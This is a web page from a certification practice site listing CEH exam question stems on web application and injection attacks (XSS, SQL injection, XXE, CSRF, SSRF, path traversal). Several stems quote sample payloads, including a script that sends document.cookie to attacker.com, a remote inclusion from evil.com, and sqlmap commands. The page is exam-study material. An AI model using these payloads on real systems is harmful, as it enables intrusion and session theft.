Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

← Web Application and Injection Attacks practice sets

CEH Web Application and Injection Attacks • Complete Question Bank

CEH Web Application and Injection Attacks — All Questions With Answers

Complete CEH Web Application and Injection Attacks question bank — all 0 questions with answers and detailed explanations.

172
Questions
Free
No signup
Certifications/CEH/Practice Test/Web Application and Injection Attacks/All Questions
Question 1mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst notices that the web application returns different response times when a valid username is submitted versus an invalid one during login. Which type of vulnerability is likely being exploited?

Question 2easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following tools is commonly used to automate the detection and exploitation of SQL injection vulnerabilities?

Question 3hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester intercepts the following request using Burp Suite: POST /change_password HTTP/1.1 Host: example.com Cookie: sessionid=abc123; SameSite=Lax Content-Type: application/x-www-form-urlencoded new_password=Hacker123 The tester successfully crafts a CSRF attack by embedding a hidden form in a malicious page. Which mitigation is most likely missing?

Question 4mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application allows users to upload profile pictures. An attacker uploads a file named "profile.php" containing malicious PHP code. When the attacker visits the uploaded file's URL, the code executes. Which vulnerability is being exploited?

Question 5mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

An analyst observes the following log entry on a web server: GET /../../etc/passwd HTTP/1.1 200. Which type of attack is indicated?

Question 6hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

During a penetration test, a tester uses the following payload in a search field: <script>alert(document.cookie)</script>. The payload is reflected in the response without sanitization. However, the tester notices that the attack only works when the payload is submitted via a POST request, not GET. Which type of XSS is this?

Question 7easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following is the primary purpose of using a CSRF token in a web application?

Question 8mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application uses user input in the following PHP code: include($_GET['page'] . '.php');. An attacker submits the URL: http://example.com/index.php?page=../../../../etc/passwd%00. Which two vulnerabilities are being attempted?

Question 9mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

Which Burp Suite tool is most appropriate for modifying and re-sending a single HTTP request multiple times with different payloads to test for SQL injection?

Question 10hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester finds that a web application accepts XML input and returns the parsed data in the response. The tester submits the following payload: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The server returns the contents of /etc/passwd. Which vulnerability is being exploited?

Question 11easymultiple choice
Read the full Web Application and Injection Attacks explanation →

An attacker attempts to log into a web application by trying many common passwords for a list of known usernames. Which type of authentication attack is this?

Question 12mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst wants to check if a web application is vulnerable to Server-Side Request Forgery (SSRF). Which of the following actions would be most effective?

Question 13mediummulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF)?

Question 14hardmulti select
Read the full Web Application and Injection Attacks explanation →

A web application is vulnerable to SQL injection. Which THREE of the following techniques can be used to extract data from the database using blind SQL injection?

Question 15easymulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are characteristics of stored (persistent) XSS?

Question 16mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst observes that after a user submits a comment on a blog, the comment is displayed immediately on the page without sanitization. Another user visits the page and the comment's JavaScript executes in their browser. Which type of XSS attack is this?

Question 17easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following tools is primarily used for automated SQL injection exploitation and database fingerprinting?

Question 18mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester needs to perform a brute-force attack on a web application login form. Which Burp Suite tool is specifically designed for automating parameterized attacks like password guessing?

Question 19hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application uses a parameter 'file' to include server-side files. The following request is intercepted: GET /page.php?file=../../../etc/passwd HTTP/1.1. The response contains the contents of /etc/passwd. This vulnerability is most likely which of the following?

Question 20mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following is a recommended defense against Cross-Site Request Forgery (CSRF) attacks?

Question 21hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A tester sends the following payload to a web application: %3Cscript%3Ealert('XSS')%3C/script%3E. The application echoes back the decoded payload in the response without sanitization. This behavior is typical of which type of vulnerability?

Question 22easymultiple choice
Read the full Web Application and Injection Attacks explanation →

An attacker discovers that a web application's login form allows unlimited login attempts. The attacker uses a list of usernames and passwords obtained from a previous breach to gain access. This attack is known as:

Question 23mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester is assessing a web application and notices that the application reflects the User-Agent header in the response body without sanitization. What attack could be performed using this behavior?

Question 24hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

An attacker sends a request to a web server with the following header: X-Forwarded-For: 127.0.0.1. The server processes the request as if it came from localhost and grants administrative access. This is an example of:

Question 25easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following is a symptom of a successful command injection attack?

Question 26mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web developer wants to mitigate CSRF attacks. Which of the following configurations for cookies is most effective when combined with CSRF tokens?

Question 27hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

During an assessment, a tester discovers that the web application accepts XML input and returns the parsed data. The tester submits the following payload: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The response contains the contents of /etc/passwd. This vulnerability is known as:

Question 28mediummulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are effective defenses against SQL injection attacks?

Question 29mediummulti select
Read the full Web Application and Injection Attacks explanation →

Which THREE of the following are common indicators of an ongoing brute-force attack against a web application?

Question 30hardmulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are valid methods to exploit or test for Server-Side Request Forgery (SSRF)?

Question 31mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst notices that after submitting a form on a web application, the URL changes to include the user's ID parameter, e.g., 'user?id=123'. The analyst modifies the ID in the URL and accesses another user's profile without authorization. Which type of vulnerability is being exploited?

Question 32easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which Burp Suite tool is specifically designed to automate customized attacks on web applications, such as brute-forcing login forms or fuzzing parameters?

Question 33hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

During a penetration test, a tester uses SQLMap with the following command: 'sqlmap -u "http://target.com/page?id=1" --os-shell'. The target is a Linux server running MySQL. Which SQL injection technique will SQLMap likely attempt to use to achieve an OS shell?

Question 34mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application allows users to upload profile pictures. The application uses the filename provided by the user to save the file on the server. An attacker uploads a file named 'malicious.php%00.png' and the server saves it as 'malicious.php'. Which vulnerability is being exploited?

Question 35easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following is the BEST defense against brute-force attacks on a login form?

Question 36mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester discovers that a web application includes the following code: 'include($_GET['page'] . '.php');' and the application is running on a Linux server. The tester attempts to exploit this by accessing 'index.php?page=../../etc/passwd'. What type of attack is this, and will it succeed?

Question 37hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

An attacker wants to perform a CSRF attack against a banking application. The application uses SameSite cookies set to 'Strict'. The attacker hosts a malicious page on their own domain. When the victim visits the malicious page, which of the following statements is TRUE regarding the CSRF attack?

Question 38mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application uses XML to transmit data between client and server. A tester submits the following payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. The application returns the content of the /etc/passwd file in the response. Which vulnerability is present?

Question 39mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

During a web application test, an analyst intercepts a request containing a 'Referer' header that points to a different domain. The analyst modifies the request by removing the 'Referer' header and the action still executes successfully. Which type of attack is the analyst testing?

Question 40easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following is a common indicator of a stored (persistent) Cross-Site Scripting (XSS) attack?

Question 41hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application firewall (WAF) blocks requests containing ' UNION SELECT '. A penetration tester wants to bypass this restriction to perform a union-based SQL injection. Which of the following techniques is MOST likely to succeed?

Question 42mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

An organization wants to prevent directory listing on its Apache web server. Which of the following configuration changes would achieve this?

Question 43mediummulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are effective mitigations against Clickjacking attacks? (Choose 2)

Question 44hardmulti select
Read the full Web Application and Injection Attacks explanation →

Which THREE of the following are types of SQL injection attacks? (Choose 3)

Question 45easymulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are common tools used for web application security testing? (Choose 2)

Question 46easymultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst notices that a web application returns different page sizes when a valid user ID is submitted versus an invalid one in the URL parameter. Which type of vulnerability is most likely being exploited?

Question 47easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following tools is specifically designed to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications?

Question 48mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

During a web application penetration test, a tester submits a comment containing '<script>alert("XSS")</script>' and the script executes for all users who view the comment. Which type of cross-site scripting (XSS) vulnerability is present?

Question 49mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application uses a URL parameter to fetch a file from the server, e.g., 'download.php?file=report.pdf'. An attacker changes the parameter to '../../etc/passwd' and retrieves the password file. This attack is known as:

Question 50mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following is the most effective defense against Cross-Site Request Forgery (CSRF) attacks?

Question 51hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

An attacker intercepts a request and notices that the server reflects the value of the 'User-Agent' header in the response without sanitization. The attacker crafts a payload that triggers an alert box. This is an example of:

Question 52mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

In Burp Suite, which tool is used to modify and resend individual HTTP requests to observe responses, allowing manual testing of input validation and parameter manipulation?

Question 53hardmultiple choice
Read the full NAT/PAT explanation →

A penetration tester finds that a web application allows uploading a file with the name '../../var/www/html/shell.php'. The file is successfully written to the server. Which combination of vulnerabilities does this exploit?

Question 54mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following best describes a Server-Side Request Forgery (SSRF) attack?

Question 55hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application uses XML to transfer data. An attacker submits the following payload: '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. What vulnerability is being exploited?

Question 56easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following is a common defense against clickjacking attacks?

Question 57mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst observes the following in Apache access logs: 'GET /cgi-bin/test.cgi?cmd=id HTTP/1.1' 200. This is most likely an attempt at which attack?

Question 58mediummulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are types of SQL injection? (Select 2)

Question 59hardmulti select
Read the full Web Application and Injection Attacks explanation →

Which THREE of the following are effective mitigations against brute force attacks on web application login forms? (Select 3)

Question 60mediummulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following attacks can be prevented by properly validating and sanitizing user input? (Select 2)

Question 61mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst notices that the web application returns different response times when querying user IDs. For example, a valid user ID returns the page in 2 seconds, while an invalid ID returns in 0.5 seconds. The analyst suspects a blind SQL injection vulnerability. Which SQL injection technique is MOST likely being used?

Question 62easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which OWASP Top 10 (2021) category describes the vulnerability where an application allows an attacker to include a remote file from an external server, leading to code execution or data disclosure?

Question 63mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

During a web application penetration test, a tester uses Burp Suite's Repeater tool to manually manipulate a request and observe the response. After sending the same request multiple times, the application returns a 302 redirect pointing to a login page. What is the MOST likely cause?

Question 64hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester is testing an IIS web server and wants to exploit a WebDAV misconfiguration to upload a web shell. Which HTTP method should the tester check to determine if WebDAV is enabled and allows file uploads?

Question 65mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst identifies a vulnerability where an attacker can include a local file such as '/etc/passwd' by manipulating the 'page' parameter in the URL: http://example.com/index.php?page=../../../../etc/passwd. What type of attack is this?

Question 66easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following is a primary purpose of the SameSite cookie attribute in mitigating CSRF attacks?

Question 67mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester is using SQLMap to automate exploitation of a SQL injection vulnerability found in a login form. The tester wants to retrieve the names of all databases on the backend MySQL server. Which SQLMap flag should be used?

Question 68hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

During a penetration test, the tester finds that the Apache server is configured with directory listing enabled on the /uploads directory. The tester navigates to http://example.com/uploads/ and sees a list of files. Which of the following is the MOST immediate security concern?

Question 69mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application is vulnerable to server-side request forgery (SSRF). An attacker sends a request that causes the server to make an internal HTTP request to http://169.254.169.254/latest/meta-data/. What is the attacker attempting to achieve?

Question 70easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following describes the difference between reflected and stored (persistent) cross-site scripting (XSS)?

Question 71mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst observes that a web application allows users to submit feedback, and after submission, the feedback is displayed on a public page. An attacker submits feedback containing the script: <script>document.location='http://attacker.com/?c='+document.cookie</script>. When an admin views the public page, the script executes. Which type of attack occurred?

Question 72hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

During a security assessment, a tester discovers an endpoint that reflects the 'User-Agent' header in the response without sanitization. The tester wants to confirm a reflected XSS vulnerability. Which of the following payloads would be MOST effective to demonstrate the issue in a single request?

Question 73mediummulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are effective defenses against CSRF attacks? (Choose 2.)

Question 74hardmulti select
Read the full Web Application and Injection Attacks explanation →

Which THREE of the following are common indicators of an SQL injection attack? (Choose 3.)

Question 75mediummulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are valid techniques used in password spraying attacks? (Choose 2.)

Question 76mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst notices that a web application returns different HTTP responses for valid and invalid usernames during login. Which attack is this behavior most likely facilitating?

Question 77easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following tools is specifically designed to automate the detection and exploitation of SQL injection vulnerabilities?

Question 78mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester discovers that a web application's search functionality reflects user input directly in the page source without sanitization. The tester crafts a URL like http://example.com/search?q=<script>alert('XSS')</script> and the script executes. This is an example of which type of XSS?

Question 79hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

During a web application assessment, a tester intercepts a request and modifies the 'Referer' header. The application then performs a state-changing action without requiring a token. Which vulnerability is most likely present?

Question 80mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application allows users to access files using parameters like 'file=report.pdf'. A tester changes the parameter to '../../etc/passwd' and retrieves the system password file. This is an example of which attack?

Question 81easymultiple choice
Read the full Web Application and Injection Attacks explanation →

A security team is implementing measures to prevent cross-site request forgery (CSRF) attacks. Which of the following is the most effective mitigation technique?

Question 82mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

An analyst notices that a web application's login page returns a generic 'Invalid credentials' message regardless of whether the username is valid. This is an example of which security control?

Question 83hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A web server is configured with WebDAV and allows PUT requests. An attacker uploads a .asp file and accesses it to execute code. Which tool or method is most directly associated with exploiting this misconfiguration?

Question 84mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester uses a tool to intercept and modify HTTP/HTTPS requests in real-time between the browser and the web application. Which tool is being used?

Question 85mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

An application is vulnerable to server-side request forgery (SSRF). An attacker exploits this to access internal services. Which of the following is a common indicator of SSRF?

Question 86easymultiple choice
Read the full NAT/PAT explanation →

Which of the following best describes the attack where an attacker uses a valid session token to impersonate a user without needing to authenticate?

Question 87hardmulti select
Read the full Web Application and Injection Attacks explanation →

A security analyst is reviewing a web application log and sees the following request: GET /page?file=../../../etc/passwd HTTP/1.1. Which TWO vulnerabilities are most likely being attempted? (Select two)

Question 88mediummulti select
Read the full Web Application and Injection Attacks explanation →

Which THREE of the following are common types of SQL injection attacks? (Select three)

Question 89mediummulti select
Read the full Web Application and Injection Attacks explanation →

An application uses the SameSite cookie attribute. Which TWO of the following are valid values for this attribute and their purposes? (Select two)

Question 90hardmulti select
Read the full Web Application and Injection Attacks explanation →

During a penetration test, a tester observes that a web application's login form does not implement rate limiting and returns different error messages for valid vs invalid usernames. Which THREE attacks are most likely to be successful? (Select three)

Question 91mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst notices that a web application returns different error messages for valid and invalid usernames during login. Which type of attack is this application MOST vulnerable to?

Question 92mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

During a penetration test, you identify a parameter in a web application that appears to fetch a file from the server. You modify the parameter to '../../../etc/passwd' and see the contents of the passwd file. Which type of vulnerability is this?

Question 93easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following is the BEST defense against Cross-Site Request Forgery (CSRF) attacks?

Question 94mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application allows users to submit feedback that is stored in a database and displayed to other users without proper sanitization. A tester inputs '<script>alert(1)</script>' and it executes when other users view the feedback. Which type of XSS is this?

Question 95hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page.php?id=1' --batch --dbs. Which database enumeration technique is SQLMap using by default?

Question 96mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web server is found to have directory listing enabled for the /uploads folder. An attacker discovers a shell.php file uploaded earlier. Which attack is the attacker MOST likely to perform next?

Question 97mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security team wants to test their web application for vulnerabilities. Which Burp Suite tool is BEST suited for automating attacks like brute-force or fuzzing?

Question 98hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application has an endpoint that takes a URL parameter and fetches content from that URL, returning it to the user. An attacker supplies 'file:///etc/passwd' and reads the server's passwd file. Which vulnerability is this?

Question 99easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following is a primary defense against SQL injection attacks?

Question 100mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

An attacker performs a password spraying attack against a web application. Which of the following BEST describes this technique?

Question 101mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester finds that a web application includes files based on user input without proper validation. The tester supplies 'http://attacker.com/malicious.txt' and the application includes its content. Which vulnerability is this?

Question 102hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application uses an XML parser to process user-supplied XML documents. An attacker submits the following payload: <?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><root>&xxe;</root>. Which vulnerability is being exploited?

Question 103mediummulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are characteristics of a reflected Cross-Site Scripting (XSS) attack? (Select 2)

Question 104easymulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are commonly used to mitigate SQL injection vulnerabilities? (Select 2)

Question 105hardmulti select
Read the full Web Application and Injection Attacks explanation →

Which THREE of the following are valid defenses against CSRF attacks? (Select 3)

Question 106mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

During a web application penetration test, a security analyst intercepts a request using Burp Suite and notices the following parameter in the URL: /profile?user_id=123. By changing the user_id to 124, the analyst is able to view another user's profile. Which vulnerability is being exploited?

Question 107hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A security team discovers that their web application is vulnerable to a Server-Side Request Forgery (SSRF) attack. Which of the following is the MOST effective mitigation technique to prevent SSRF?

Question 108easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following tools is specifically designed to automate the exploitation of SQL injection vulnerabilities and retrieve data from databases?

Question 109mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester identifies a web page that reflects user input in the response without proper encoding. The input is submitted via a GET parameter. Which type of cross-site scripting (XSS) is MOST likely present?

Question 110mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst is reviewing HTTP response headers and notices the following: Set-Cookie: sessionId=abc123; SameSite=Lax. What is the primary purpose of the SameSite attribute?

Question 111mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

During a penetration test, you find a web application that includes files using a parameter like /index.php?page=about. When you change the parameter to /etc/passwd, the application returns the contents of the password file. Which vulnerability is present?

Question 112easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which HTTP method is commonly used by WebDAV to upload files to a web server, and if misconfigured, could allow an attacker to upload malicious scripts?

Question 113hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application takes a URL from user input and fetches the content to display on the page. An attacker submits a URL pointing to an internal service like http://localhost:8080/admin. The server retrieves the internal resource and returns it. What is this attack?

Question 114easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following Burp Suite tools is used to automatically fuzz web application inputs and identify common vulnerabilities like SQL injection and XSS?

Question 115mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester attempts a SQL injection on a login form and receives no error messages, but notices a delay in the server response when injecting ' OR SLEEP(5)--. Which type of SQL injection is this?

Question 116hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

After a security incident, logs show repeated login attempts from different IP addresses using a list of common passwords against a single username. Which attack technique is being used?

Question 117mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application allows users to upload profile images. An attacker uploads a file named 'image.php.png' with malicious PHP code, and the server executes it as PHP. Which type of vulnerability is this?

Question 118mediummulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are effective defenses against Cross-Site Request Forgery (CSRF) attacks? (Select 2)

Question 119hardmulti select
Read the full Web Application and Injection Attacks explanation →

Which THREE of the following are types of SQL injection attacks? (Select 3)

Question 120easymulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are common indicators of a command injection vulnerability? (Select 2)

Question 121mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application tester notices that the application reflects user input in the URL without proper encoding. The tester submits a payload <script>alert('xss')</script> in a search field and the script executes in the browser. Which type of XSS vulnerability is this MOST likely?

Question 122mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

During a penetration test, a security analyst discovers that a web application uses sequential numeric identifiers in URLs (e.g., /profile?id=100). By modifying the id parameter, the analyst can access another user's profile data without authorization. Which vulnerability is being exploited?

Question 123easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following tools is specifically designed to automate the detection and exploitation of SQL injection vulnerabilities in web applications?

Question 124hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

An application allows users to upload XML files for processing. A tester uploads the following payload: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The server returns the contents of /etc/passwd. Which attack is being performed?

Question 125mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst observes that a web application's login page responds with different HTTP status codes and response times for valid versus invalid usernames. This information leakage could be used to perform which type of authentication attack?

Question 126easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following is a primary defense mechanism against Cross-Site Request Forgery (CSRF) attacks?

Question 127mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester uses Burp Suite Repeater to manually modify and resend HTTP requests to a web server. In which phase of the testing methodology is this tool most commonly employed?

Question 128hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

While analyzing web server logs, an analyst finds the following entry: GET /../../../../etc/passwd HTTP/1.1 with a 200 OK response. Which vulnerability is indicated, and what is the MOST likely impact?

Question 129mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following describes a Server-Side Request Forgery (SSRF) attack?

Question 130easymultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application tester uses the following Burp Suite feature to automatically send multiple requests with different payloads to test for common vulnerabilities. Which feature is being used?

Question 131hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

An attacker exploits a vulnerable parameter in a web application by submitting the following payload: http://target.com/page.php?file=http://evil.com/shell.txt. The server returns the contents of the remote file. This is an example of which type of attack?

Question 132mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst discovers that a web application's search box reflects user input without proper sanitization. However, the attacker must trick a victim into clicking a crafted link containing the malicious script. This vulnerability is classified as which type?

Question 133mediummulti select
Read the full Web Application and Injection Attacks explanation →

A penetration tester is assessing a web application and wants to manually test for SQL injection vulnerabilities. Which TWO tools or techniques are best suited for this task?

Question 134hardmulti select
Read the full Web Application and Injection Attacks explanation →

Which THREE of the following are effective mitigation techniques against Cross-Site Scripting (XSS) attacks?

Question 135easymulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are common types of SQL injection attacks?

Question 136hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

An analyst reviews a web server log and sees the following request: GET /search?q=<script>alert('xss')</script> HTTP/1.1. The response from the server includes the search term inside a <div> tag without any sanitization. Which type of XSS vulnerability does this indicate?

Question 137mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page?id=1' --batch --dbs. Which of the following best describes what this command will do?

Question 138easymultiple choice
Read the full Web Application and Injection Attacks explanation →

An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP request to a sensitive internal service. Which type of attack is this?

Question 139mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst notices that a web application uses sequential numeric IDs for user accounts (e.g., /profile?id=1001). By changing the ID to 1002, the analyst can view another user's profile. Which vulnerability is present?

Question 140mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

During a web application penetration test, a tester uses Burp Suite's Intruder tool to automate a series of login attempts using a list of common passwords. Which attack type is being performed?

Question 141hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

An analyst reviews the following HTTP response: HTTP/1.1 200 OK Set-Cookie: sessionid=abc123; SameSite=None; Secure ... <html><body><p>Welcome back!</p></body></html>. What possible vulnerability exists if the application does not use CSRF tokens?

Question 142mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following is the most effective defense against SQL injection attacks?

Question 143easymultiple choice
Read the full Web Application and Injection Attacks explanation →

An attacker exploits an application by uploading a file that contains server-side script code, leading to arbitrary command execution on the web server. Which best describes this attack?

Question 144hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A security engineer observes that an internal web application uses XML to transmit data between systems. The engineer discovers that by sending a crafted XML payload, they can read sensitive files from the server's filesystem. Which attack is being performed?

Question 145easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which Burp Suite tool is specifically designed to intercept and modify HTTP(S) traffic between the browser and the target web application?

Question 146mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application allows users to submit feedback that is stored in a database and later displayed to administrators. An attacker submits feedback containing <script>alert('stored')</script>. When an admin views the feedback page, the script executes. Which type of XSS is this?

Question 147mediummultiple choice
Read the full NAT/PAT explanation →

An attacker uses the following URL pattern to access files: http://example.com/../../etc/passwd. Which attack is being attempted?

Question 148mediummulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF) attacks? (Select 2)

Question 149hardmulti select
Read the full Web Application and Injection Attacks explanation →

Which THREE of the following are common indicators of a Server-Side Request Forgery (SSRF) vulnerability? (Select 3)

Question 150easymulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are common methods to detect SQL injection vulnerabilities in a web application? (Select 2)

Question 151mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst observes a web application returning database error messages containing table names and column names in the HTTP response. Which type of SQL injection is MOST likely being exploited?

Question 152mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

During a web application test, a penetration tester intercepts a request using Burp Suite Proxy, modifies the 'Referer' header, and resends the request. The application processes the request despite the modified header. Which attack is the tester attempting to validate?

Question 153easymultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application allows users to view documents by specifying a filename in the URL, e.g., /getDocument?file=report.pdf. A tester changes the file parameter to '../../etc/passwd' and retrieves the system password file. Which vulnerability is being exploited?

